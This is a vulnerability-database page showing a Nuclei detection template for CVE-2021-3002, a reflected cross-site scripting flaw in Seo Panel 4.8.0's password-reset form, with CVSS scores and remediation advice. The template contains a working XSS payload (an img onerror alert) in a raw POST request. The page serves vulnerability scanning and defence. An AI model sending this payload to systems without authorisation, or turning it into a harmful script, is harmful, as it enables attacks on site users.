Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-3002
HistoryMar 07, 2022 - 7:47 p.m.

Seo Panel 4.8.0 - Cross-Site Scripting

2022-03-0719:47:40
ProjectDiscovery
github.com
6
cve2021
seopanel
cross-site scripting
web pages
data theft
session hijacking
web security

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

50.4%

Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.

id: CVE-2021-3002

info:
  name: Seo Panel 4.8.0 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor.
  reference:
    - http://www.cinquino.eu/SeoPanelReflect.htm
    - https://github.com/seopanel/Seo-Panel/issues/202
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3002
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ArrestX/--POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-3002
    cwe-id: CWE-79
    epss-score: 0.00143
    epss-percentile: 0.50121
    cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: seopanel
    product: seo_panel
  tags: cve2021,cve,seopanel,xss

http:
  - raw:
      - |
        POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>"
          - "seopanel"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022075e88f3f4bc875a9a0bb1b5fd257624b8a290b5de6c2cc98d0fd95f5d30e286402204d1a6aa490440a2c56dfa06bf3b9ff9bc4daab09bb4441a8d18099d73e218936:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

50.4%

Related for NUCLEI:CVE-2021-3002